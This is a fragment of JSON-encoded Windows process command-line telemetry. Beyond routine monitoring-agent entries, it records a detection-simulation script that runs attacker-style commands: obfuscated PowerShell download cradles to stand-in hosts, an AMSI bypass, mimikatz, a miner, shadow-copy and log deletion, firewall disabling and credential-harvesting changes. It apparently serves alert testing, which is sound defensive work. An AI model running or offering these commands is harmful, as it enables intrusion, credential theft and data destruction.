Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\222\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"nan\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\system32\\\\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\winsxs\\\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.2602_none_7ee6020e2207416d\\\\TiWorker.exe -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"nan\",\"C:\\\\Windows\\\\system32\\\\MusNotification.exe Display\",\"cmd.exe /c c:\\\\Diagnostics\\\\WindowsSimulateDetections.bat c:\\\\Diagnostics\\\\UserTmp\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; marcook@microsoft.com; dotanp@microsoft.com; liengli@microsoft.com\",\"net user adm1nistrator Bob_testing /add\",\"C:\\\\Windows\\\\system32\\\\net1 user adm1nistrator Bob_testing /add\",\"net share TestShare=c:\\\\testshare /Grant:Users,Read\",\"C:\\\\Windows\\\\system32\\\\net1 share TestShare=c:\\\\testshare /Grant:Users,Read\",\"net use q: \\\\\\\\MSTICAlertsWin1\\\\TestShare Bob_testing /User:adm1nistrator\",\"net use q: /delete\",\"net share TestShare /delete\",\"C:\\\\Windows\\\\system32\\\\net1 share TestShare /delete\",\"net user adm1nistrator /delete\",\"C:\\\\Windows\\\\system32\\\\net1 user adm1nistrator /delete\",\".\\\\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\suchost.exe -a cryptonight -o bcn -u bond007.01 -p x -t 4\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd /c \\\"echo TVqQAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> delme.b64\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd /c \\\"echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> delme.b64\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"certutil -decode delme.b64 implant.exe\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"implant.exe k111\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"implant.exe 81ed03caf6901e444c72ac67d192fb9c\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"implant.exe -b -t -m\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd /c \\\"echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell -Noninteractive -Noprofile -Command \\\"Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell Invoke-Shellcode.ps1\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell Invoke-ReverseDnsLookup.ps1\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell -command \\\"(New-Object Net.WebClient).DownloadString(('ht'+'tp://pasteb' + 'bin/'+'raw/'+'pqCwEm17'));\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell -command {(n`EW-obJ`E`cT N`et`.W`eb`C`li`en`t).DownloadFile('https://blah/png','google.png')}\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell.exe -c \\\"$a = 'Download'+'String'+\\\"(('ht'+'tp://paste'+ 'bin/'+'raw/'+'pqCwEm17'))\\\";$b = '(New-Object' + ' Net.WebClient)';'$b.$a' | Out-File .\\\\evil.ps1;\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell -c {IEX (New-Object Net.WebClient).DownloadString(('ht'+(\\\"{2}{0}{1}\\\"-f ':/','/paste','tp')+'bin/'+'raw/'+(\\\"{1}{0}\\\"-f'Em17','pqCw')));}\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd /c \\\".\\\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^tar^t-bITSTRanS^fER -^SOURCE^ 'http://somedomain/best-kitten-names-1.jpg' ^-d^EStIN^At^IOn ^'C:\\\\Users\\\\$env:UserName\\\\AppData\\\\Local\\\\Temp\\\\kittens1.jpg';\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd /c \\\".\\\\n^e^t u^se^r\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell -enc JAB0ACAAPQAgACcAZABpAHIAJwA7AA0ACgAmACAAKAAnAEkAbgB2AG8AawBlACcAKwAnAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAnACkAIAAkAHQA\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd /c \\\"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd /c \\\"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd /c \\\"echo blahtest > \\\\\\\\.\\\\pipe\\\\blahtest\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\reg.exe add \\\"hkcu\\\\console\\\" /v windowposition /t reg_dword /d 33554556 /f\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"c:\\\\windows\\\\fonts\\\\csrss.exe\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"C:\\\\Windows\\\\system32\\\\WerFault.exe -u -p 6060 -s 472\",\"c:\\\\windows\\\\fonts\\\\conhost.exe\",\".\\\\mimikatz.exe\",\".\\\\rundll32.exe /C c:\\\\windows\\\\fonts\\\\conhost.exe\",\"c:\\\\windows\\\\fonts\\\\conhost.exe\",\".\\\\regsvr32 /u /s c:\\\\windows\\\\fonts\\\\csrss.exe\",\"tasklist\",\"net localgroup Administrators\",\"C:\\\\Windows\\\\system32\\\\net1 localgroup Administrators\",\"whoami\",\"hostname\",\"netstat -an\",\"net user Bob1 /domain\",\"C:\\\\Windows\\\\system32\\\\net1 user Bob1 /domain\",\"net user BobX /domain\",\"C:\\\\Windows\\\\system32\\\\net1 user BobX /domain\",\"net group \\\"Domain Admins\\\" /domain\",\"C:\\\\Windows\\\\system32\\\\net1 group \\\"Domain Admins\\\" /domain\",\".\\\\rUnDlL32 /C ShEll32Control_RanDLL.dll\",\".\\\\reg query add mscfile\\\\\\\\\\\\\\\\open\",\".\\\\reg add Image File Execution Options sethc.exe\",\".\\\\ftp -s:C:\\\\RECYCLER\\\\xxppyy.exe\",\".\\\\dubrute.exe\",\".\\\\nlbrute.exe\",\".\\\\reg add \\\"HKLM\\\\system\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\" /v \\\"fDenyTSConnections\\\" /t REG_DWORD /d 0x1 /f\",\".\\\\reg add \\\"HKLM\\\\system\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\" /v \\\"fDenyTSConnections\\\" /t REG_DWORD /d 0x0 /f\",\"net use v: \\\\\\\\tsclient\\\\c\",\"net v: /delete\",\"C:\\\\Windows\\\\system32\\\\net1 v: /delete\",\"cmd /c C:\\\\Windows\\\\System32\\\\mshta.exe vbscript:CreateObject(\\\"Wscript.Shell\\\").Run(\\\".\\\\powershell.exe -c \\\"\\\"$x=$((gp HKLM:Software\\\\Microsoft\\\\Windows\\\\CurrentVersion Certificate).Certificate);.\\\\powershell -E $y\\\"\\\"\\\",0,True)(window.close)\",\".\\\\netsh advfirewall firewall add rule name=RbtGskQ action=allow program=c:\\\\users\\\\Bob\\\\appdata\\\\Roaming\\\\RbtGskQ\\\\RbtGskQ.exe\",\".\\\\reg add HKLM\\\\KEY_LOCAL_MACHINE\\\\...securityproviders\\\\wdigest uselogoncredential /t 1\",\".\\\\reg not /domain:everything that /sid:shines is /krbtgt:golden !\",\"cmd /c \\\"systeminfo && systeminfo\\\"\",\".\\\\rundll32 /C 42424.exe\",\"42424.exe\",\".\\\\rundll32 /C c:\\\\users\\\\MSTICAdmin\\\\42424.exe\",\".\\\\rundll32 /C 1234.exe\",\"1234.exe\",\".\\\\rundll32 /C c:\\\\users\\\\MSTICAdmin\\\\1234.exe\",\".\\\\rundll32 /C reg.exe\",\"reg.exe\",\".\\\\reg.exe add \\\\hkcu\\\\software\\\\microsoft\\\\some\\\\key\\\\Run /v abadvalue\",\"c:\\\\Diagnostics\\\\UserTmp\\\\tsetup.1.exe C:\\\\Users\\\\MSTICAdmin\\\\AppData\\\\Local\\\\Temp\\\\2\\\\is-01DD7.tmp\\\\tsetup.1.0.14.tmp\\\" /SL5=\\\"$250276,19992586,423424,C:\\\\Users\\\\MSTICAdmin\\\\Downloads\\\\tsetup.1.0.14.exe\",\".\\\\rundll32.exe /C mshtml,RunHTMLApplication javascript:alert(tada!)\",\".\\\\netsh.exe \\\"in (*.exe) do start # artificial commandline solely for purposes of triggering test\\\"\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell Set-ExecutionPolicy RemoteSigned&echo [S]&cd&echo [E]\\\"\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell Enable-WSManCredSSP =2013Role Server -force&echo [S]&cd&echo [E]\\\"\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell winrm set winrm/config/service/Auth @{Kerberos=003D\\\"true\\\"}&echo [S]&cd&echo [E]\\\"\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\ProgramData\\\"© \\\\\\\\[REDACTED]\\\\c$\\\\users\\\\[REDACTED]\\\\Documents\\\\\\\"Password Change Dates.docx\\\"\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&c:\\\\windows\\\\system32\\\\inetsrv\\\\appcmd set config \\\"Default Web Site/\\\" /section:httplogging /dontLog:true&echo [S]&cd&echo [E]\\\"\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&del C:\\\\inetpub\\\\logs\\\\logFiles\\\\W3SVC1\\\\*.log /q&echo [S]&cd&echo [E]\\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\perfc.dat \",\"c:\\\\Diagnostics\\\\UserTmp\\\\sdopfjiowtbkjfnbeioruj.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\doubleextension.pdf.exe \",\"vssadmin delete shadows /all /quiet\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"c:\\\\Windows\\\\System32\\\\cmd.exe /c net user\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd /c c:\\\\Diagnostics\\\\UserTmp\\\\scrsave.scr\\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\svchost.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\smss.exe \",\"c:\\\\Windows\\\\System32\\\\svchost.exe -k malicious\",\"cmd.exe /c echo createobject\\\"msxml2.xmlhttp\\\") \",\"ASC_Alerttest_662jfi039n.exe -foo\",\".\\\\powershell.exe -command [ref].assembly.gettype('http://system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').setvalue($null,$true)\\\\\\\"\",\"netsh start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\\\\\\\Users\\\\\\\\user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\bzzzzzz.txt\",\".\\\\wuauclt.exe /C \\\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\\\"\",\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\system32\\\\net1\",\".\\\\lsass.exe /C \\\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\\\"\",\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\system32\\\\net1\",\"cmd /c \\\"powershell wscript.shell used to download a .gif\\\"\",\"cacls.exe c:\\\\windows\\\\system32\\\\wscript.exe /e /t /g everyone:f\",\"cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&c:\\\\windows\\\\system32\\\\inetsrv\\\\appcmd set config \\\"Default Web Site/\\\" /section:httplogging /dontLog:true&echo [S]&cd&echo [E]\\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\2840.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\a_keygen.exe \",\"cmd /c echo \\\" SYSTEMINFO && SYSTEMINFO && DEL \\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\bittorrent.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe firewall set opmode mode=disable profile=all\",\"cmd /c echo rundll32.exe perfc.dat\",\"c:\\\\Diagnostics\\\\UserTmp\\\\ransomware.exe @ abc.com abc.wallet\",\"cmd /c echo /e:vbscript.encode /b\",\"pcalua.exe -a \\\\\\\\server\\\\payload.dll\",\"findstr /si password sysvol *.txt\",\"odbcconf.exe /S /A {REGSVR C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\{RANDOM}.txt\",\"odbcconf.exe /f my.rsp\\u00e1\\u00e1\",\"sqldumper.exe 464 0 